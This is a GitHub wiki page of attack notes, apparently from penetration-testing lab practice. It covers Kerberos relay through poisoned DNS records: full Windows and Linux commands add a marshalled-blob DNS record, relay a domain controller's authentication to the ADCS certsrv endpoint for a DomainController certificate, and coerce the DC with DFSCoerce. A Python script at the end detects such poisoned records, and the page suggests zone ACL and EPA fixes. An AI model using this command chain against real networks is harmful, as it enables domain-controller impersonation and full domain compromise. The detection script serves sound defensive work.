DNS poison and KrbRelay‐SMBServer - oscpname/RELAY_scenarios GitHub Wiki

Manual: https://github.com/decoder-it/KrbRelay-SMBServer

Tools:

WINDOWS: This KrbRelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQs to CIFS or HTTP.

# Create a DNS entry for the target server name you want to relay the Kerberos AP-REQ to, as <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA, mapped to your listener/relay IP. Domain users can typically perform secure DNS updates; for example, use the PowerShell script Invoke-DNSUpdate.
# On the Windows attacker box:
invoke-DNSUpdate -DNSName adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 192.168.1.88

# Relay the DC's SMB authentication to the HTTP (ADCS) web enrollment endpoint and request a client certificate, using a Linux box that redirects to the Windows attacker machine on port 9999:
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv  -adcs DomainController -listenerport 9999

# Trigger the coercion from the DC in another window:
DFSCoerce.exe -l adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA  -t DC-2

LINUX:

bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147

krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'

KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
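Detection side, as an added example that is not part of this wiki or of either tool: every poisoned record on this page is a legitimate host name with the marshalled target-info blob appended, and that blob starts with `1UWhRC` in both the Windows and the Linux variant (assumed stable here; the middle bytes differ). The script below scans a constructed sample zone export and reports each such label together with the real host it shadows and the address mismatch.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Relay labels are <real host> + a base64-like CREDENTIAL_TARGET_INFORMATION
# blob. Assumption: the blob always begins with "1UWhRC" (true for both
# variants shown on this page); DNS is case-insensitive, so match that way.
MARKER_RE = re.compile(r"^(?P<host>.+?)(?P<blob>1UWhRC[A-Za-z0-9+/]*)$", re.IGNORECASE)


@dataclass
class Finding:
    record: str             # the suspicious label as found in the zone
    shadowed_host: str      # the legitimate name it impersonates
    relay_ip: str           # where the poisoned record points
    legit_ip: Optional[str]  # address of the real host, None if not in the zone


def parse_records(lines: List[str]) -> List[Tuple[str, str]]:
    """Parse constructed 'name A ip' lines into (name, ip); other types are skipped."""
    recs = []
    for line in lines:
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            recs.append((parts[0], parts[2]))
    return recs


def find_relay_records(lines: List[str]) -> List[Finding]:
    """Return a Finding for every A record whose label carries the relay marker."""
    recs = parse_records(lines)
    legit = {name.lower(): ip for name, ip in recs if not MARKER_RE.match(name)}
    findings = []
    for name, ip in recs:
        m = MARKER_RE.match(name)
        if m:
            host = m.group("host")
            findings.append(Finding(name, host, ip, legit.get(host.lower())))
    return findings


# Constructed sample zone export; host names follow the examples on this page.
SAMPLE_ZONE = [
    "dc-jpq225 A 10.8.4.10",
    "adcs-mylab A 192.168.1.20",
    "fileserver A 10.8.4.11",
    "dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA A 10.8.4.147",
    "adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA A 192.168.1.88",
]

if __name__ == "__main__":
    for f in find_relay_records(SAMPLE_ZONE):
        print(f"ALERT {f.record} -> {f.relay_ip} shadows {f.shadowed_host} ({f.legit_ip})")
```

Run against a periodic zone export this is a cheap check; the durable fix is tightening the zone ACL so ordinary domain users cannot create records, plus EPA on the ADCS web enrollment endpoint the relay targets.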